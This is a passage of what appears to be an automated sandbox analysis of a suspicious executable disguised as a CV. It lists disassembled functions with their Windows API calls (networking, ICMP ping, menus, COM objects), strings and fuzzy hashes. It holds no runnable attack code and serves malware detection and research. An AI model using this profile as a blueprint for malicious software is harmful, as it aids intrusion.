                                                                                        • Opcode Fuzzy Hash: 2eb821d0fb6984563071f09c506f43a9ba2a7880441ae33614118078c0075c50
                                                                                        • Instruction Fuzzy Hash: 2D41D530400104AFDF226F69EE89BB97B66EB46730F164271FE659E1E6C7308C41EB21
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                        • String ID:
                                                                                        • API String ID: 136442275-0
                                                                                        • Opcode ID: bf641c17a67360a916e77e3d88d1da67ff2ddd3f77a5bb3d67bf824494e94d25
                                                                                        • Instruction ID: fb44e9528d8f3827d4131ec546ac3a8fb506df97fa29f0368ffa62630f247b15
                                                                                        • Opcode Fuzzy Hash: bf641c17a67360a916e77e3d88d1da67ff2ddd3f77a5bb3d67bf824494e94d25
                                                                                        • Instruction Fuzzy Hash: 5E414FB684521CAECF66EB90CC42DDB73BCEB45310F0041A6B649E6041EA30ABE58F54
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(0041DC00,0041DC00,0041DC00), ref: 003CD7CE
                                                                                        • GetDriveTypeW.KERNEL32(?,00433A70,00000061), ref: 003CD898
                                                                                        • _wcscpy.LIBCMT ref: 003CD8C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 2820617543-1000479233
                                                                                        • Opcode ID: 46de13e14cd437cf1949c0c316538989b1aaa930e11612c90fd4cfb120c4196e
                                                                                        • Instruction ID: 786404997359ee286fff51faa49eb153373082091a789be16f3fdede5a446054
                                                                                        • Opcode Fuzzy Hash: 46de13e14cd437cf1949c0c316538989b1aaa930e11612c90fd4cfb120c4196e
                                                                                        • Instruction Fuzzy Hash: 2A514F35504300AFC712FF14D891FAAB7A5EF84314F14896EF59A9B2A2EB71ED05CB42
                                                                                        APIs
                                                                                        • __swprintf.LIBCMT ref: 003893AB
                                                                                        • __itow.LIBCMT ref: 003893DF
                                                                                          • Part of subcall function 003A1557: _xtow@16.LIBCMT ref: 003A1578
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf_xtow@16
                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                        • API String ID: 1502193981-2263619337
                                                                                        • Opcode ID: 683398bd6afebc13397c255fbd3913f0f8d2b3fefe91b9175a66c16924718551
                                                                                        • Instruction ID: 8a93d9bb169e0f13f87af8d10c068917d09005d7a6e8ee012adf67e1a76cf2a1
                                                                                        • Opcode Fuzzy Hash: 683398bd6afebc13397c255fbd3913f0f8d2b3fefe91b9175a66c16924718551
                                                                                        • Instruction Fuzzy Hash: E141C475504308AFDB2AEF74D942F7AB7E8EF49310F2444ABE14ADB181EA71D941CB10
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003EA259
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 003EA260
                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003EA273
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 003EA27B
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 003EA286
                                                                                        • DeleteDC.GDI32(00000000), ref: 003EA28F
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 003EA299
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003EA2AD
                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003EA2B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                        • String ID: static
                                                                                        • API String ID: 2559357485-2160076837
                                                                                        • Opcode ID: d0da242cb8fafd935c4ff9ba26baca0595ec3fcd0292c8bcbea8ed4f9b89c390
                                                                                        • Instruction ID: 2625f24768e6df5405e7ab50198bc57555e5b876547c9306999e8184d756f079
                                                                                        • Opcode Fuzzy Hash: d0da242cb8fafd935c4ff9ba26baca0595ec3fcd0292c8bcbea8ed4f9b89c390
                                                                                        • Instruction Fuzzy Hash: 8A318D31500525ABDF125FA5DD49FEA3B69FF0D360F110724FA19A60E0CB36E815DBA8
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        • API String ID: 2620052-3771769585
                                                                                        • Opcode ID: 2d513b454e534d7e41c91678b619e1d8bce382bffcd8b5ac1e4706aa247fa417
                                                                                        • Instruction ID: 1ad9784448b2c1702a258840c2d4006b2b1b392ece569602b85a2904be0abec0
                                                                                        • Opcode Fuzzy Hash: 2d513b454e534d7e41c91678b619e1d8bce382bffcd8b5ac1e4706aa247fa417
                                                                                        • Instruction Fuzzy Hash: 65110672904119AFCB2AABB0AC0AFDA77ACEF45710F01407DF005EA081EF70DE858B64
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003A5047
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        • __gmtime64_s.LIBCMT ref: 003A50E0
                                                                                        • __gmtime64_s.LIBCMT ref: 003A5116
                                                                                        • __gmtime64_s.LIBCMT ref: 003A5133
                                                                                        • __allrem.LIBCMT ref: 003A5189
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003A51A5
                                                                                        • __allrem.LIBCMT ref: 003A51BC
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003A51DA
                                                                                        • __allrem.LIBCMT ref: 003A51F1
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003A520F
                                                                                        • __invoke_watson.LIBCMT ref: 003A5280
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                        • String ID:
                                                                                        • API String ID: 384356119-0
                                                                                        • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                        • Instruction ID: 455c9aa45346114d663d3db2dde4541e6a6f19847ea38981966deddbbbbccec2
                                                                                        • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                        • Instruction Fuzzy Hash: B071F672A01B16ABD716DF78CC81BAA73A8FF12364F154629F510DB681E770DD408BD0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003C4DF8
                                                                                        • GetMenuItemInfoW.USER32(00441708,000000FF,00000000,00000030), ref: 003C4E59
                                                                                        • SetMenuItemInfoW.USER32(00441708,00000004,00000000,00000030), ref: 003C4E8F
                                                                                        • Sleep.KERNEL32(000001F4), ref: 003C4EA1
                                                                                        • GetMenuItemCount.USER32(?), ref: 003C4EE5
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 003C4F01
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 003C4F2B
                                                                                        • GetMenuItemID.USER32(?,?), ref: 003C4F70
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003C4FB6
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C4FCA
                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C4FEB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4176008265-0
                                                                                        • Opcode ID: d1a3aeb8950d1c17f9a5f2d0013e1d3d8e3528ed624c29e115db641f7814a4ce
                                                                                        • Instruction ID: 0faf29a3ce87dc574fd3b873d86766f9077a4f7f8c2906cd92258eee8a333bff
                                                                                        • Opcode Fuzzy Hash: d1a3aeb8950d1c17f9a5f2d0013e1d3d8e3528ed624c29e115db641f7814a4ce
                                                                                        • Instruction Fuzzy Hash: 5A617B75900289AFEB22CFA4DD98FAE7BB8EB45318F15006DF841E7291D731AD45CB20
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003E9C98
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003E9C9B
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003E9CBF
                                                                                        • _memset.LIBCMT ref: 003E9CD0
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003E9CE2
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003E9D5A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 830647256-0
                                                                                        • Opcode ID: 77aaceb355adf949c8ef320fdd2444d69dd9712a4714513bab1e29f8f7d13d9d
                                                                                        • Instruction ID: 6362a745ff693329bbf08938e336698b6baef6adf8d508caad267a97d539f8f9
                                                                                        • Opcode Fuzzy Hash: 77aaceb355adf949c8ef320fdd2444d69dd9712a4714513bab1e29f8f7d13d9d
                                                                                        • Instruction Fuzzy Hash: 55617C75900258AFDB11DFA4CC81FEE77B8EB09704F15426AFA04EB2E1D774A941DB50
                                                                                        APIs
                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003B94FE
                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 003B9549
                                                                                        • VariantInit.OLEAUT32(?), ref: 003B955B
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 003B957B
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 003B95BE
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 003B95D2
                                                                                        • VariantClear.OLEAUT32(?), ref: 003B95E7
                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 003B95F4
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003B95FD
                                                                                        • VariantClear.OLEAUT32(?), ref: 003B960F
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003B961A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                        • String ID:
                                                                                        • API String ID: 2706829360-0
                                                                                        • Opcode ID: cf63e95a24e04d24b344dc3caaa8f474fcda00af85c8c869c1f0fbdcb8b9b067
                                                                                        • Instruction ID: 40e218e92d80c1a9b370deb7c80806c5a5dcb91c115c4d5547cccc1725086313
                                                                                        • Opcode Fuzzy Hash: cf63e95a24e04d24b344dc3caaa8f474fcda00af85c8c869c1f0fbdcb8b9b067
                                                                                        • Instruction Fuzzy Hash: 65414135D00219AFCB02DFE4DC84ADEBB79FF48354F108066E601A7261DB30EA45CBA5
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?C$|?C
                                                                                        • API String ID: 2862541840-2982451875
                                                                                        • Opcode ID: 2c045bb44669193688c1289ca69168c1bac59dc3c699c83a553fe01afa1ce465
                                                                                        • Instruction ID: 321f24c1be2138c7fdd71c280e13bc5858222dec36e82f24cb4899515e8c7c9b
                                                                                        • Opcode Fuzzy Hash: 2c045bb44669193688c1289ca69168c1bac59dc3c699c83a553fe01afa1ce465
                                                                                        • Instruction Fuzzy Hash: 37918E72A00219EBDF26CFA5D844FAEBBB9EF45710F12815AF515AB280D7709944CFA0
                                                                                        APIs
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • CoInitialize.OLE32 ref: 003DADF6
                                                                                        • CoUninitialize.OLE32 ref: 003DAE01
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,0040D8FC,?), ref: 003DAE61
                                                                                        • IIDFromString.OLE32(?,?), ref: 003DAED4
                                                                                        • VariantInit.OLEAUT32(?), ref: 003DAF6E
                                                                                        • VariantClear.OLEAUT32(?), ref: 003DAFCF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                        • API String ID: 834269672-1287834457
                                                                                        • Opcode ID: 1107c5f45e4d202ba4e43eece4f45f9f90df170d2188adb7625dc962dfbcf511
                                                                                        • Instruction ID: 689702b715731563ace16723cecac3eab8e027e50f3b388e2383bf3ce25bef44
                                                                                        • Opcode Fuzzy Hash: 1107c5f45e4d202ba4e43eece4f45f9f90df170d2188adb7625dc962dfbcf511
                                                                                        • Instruction Fuzzy Hash: 4D61CD72608B019FC712EF54EA48B6AB7E8AF88714F10445AF9859B391C770ED48CB97
                                                                                        APIs
                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 003D8168
                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 003D81AD
                                                                                        • gethostbyname.WSOCK32(?), ref: 003D81B9
                                                                                        • IcmpCreateFile.IPHLPAPI ref: 003D81C7
                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 003D8237
                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 003D824D
                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003D82C2
                                                                                        • WSACleanup.WSOCK32 ref: 003D82C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                        • String ID: Ping
                                                                                        • API String ID: 1028309954-2246546115
                                                                                        • Opcode ID: 0d4243cc126de128a78e078eed2ba8ee9643e9bac883b865d8f96873aab12cc5
                                                                                        • Instruction ID: 2f15957cb090bc338f73ab16e11b9d6f697273d27abf07a2d86ef61a967d0f94
                                                                                        • Opcode Fuzzy Hash: 0d4243cc126de128a78e078eed2ba8ee9643e9bac883b865d8f96873aab12cc5
                                                                                        • Instruction Fuzzy Hash: DB519132604700AFDB12EF64DD45B2AB7E4EF48320F05496AF955EB3A0DB70E905CB41
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003CE396
                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003CE40C
                                                                                        • GetLastError.KERNEL32 ref: 003CE416
                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 003CE483
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                        • API String ID: 4194297153-14809454
                                                                                        • Opcode ID: 4b51c5d4f01e2b8730b7feeeb8f1da135d5c216f12cf4a0cdfa881d702d27fdc
                                                                                        • Instruction ID: 43f633d4d4904d860d0687677837eb37f63ae063dea0dd4fcec1f705afa980f8
                                                                                        • Opcode Fuzzy Hash: 4b51c5d4f01e2b8730b7feeeb8f1da135d5c216f12cf4a0cdfa881d702d27fdc
                                                                                        • Instruction Fuzzy Hash: 6131B536A002099FDB06EFA5CD45FBDB7B8EF48301F14806AE505EB291DB74AE01CB51
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003BB98C
                                                                                        • GetDlgCtrlID.USER32 ref: 003BB997
                                                                                        • GetParent.USER32 ref: 003BB9B3
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 003BB9B6
                                                                                        • GetDlgCtrlID.USER32(?), ref: 003BB9BF
                                                                                        • GetParent.USER32(?), ref: 003BB9DB
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 003BB9DE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1383977212-1403004172
                                                                                        • Opcode ID: 6be8fa6e2d8fa72076ba9e7dd0ca391f18fd35857b868e7161cbd3d6f719767a
                                                                                        • Instruction ID: 394db5c1df7ddfc986fd27747add96356bce9017b8350c8420054536fd691011
                                                                                        • Opcode Fuzzy Hash: 6be8fa6e2d8fa72076ba9e7dd0ca391f18fd35857b868e7161cbd3d6f719767a
                                                                                        • Instruction Fuzzy Hash: E721C874900208BFDB06ABB4CC85EFEB7B5EF49304F100156F651A72D1DBB55919DB24
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003BBA73
                                                                                        • GetDlgCtrlID.USER32 ref: 003BBA7E
                                                                                        • GetParent.USER32 ref: 003BBA9A
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 003BBA9D
                                                                                        • GetDlgCtrlID.USER32(?), ref: 003BBAA6
                                                                                        • GetParent.USER32(?), ref: 003BBAC2
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 003BBAC5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
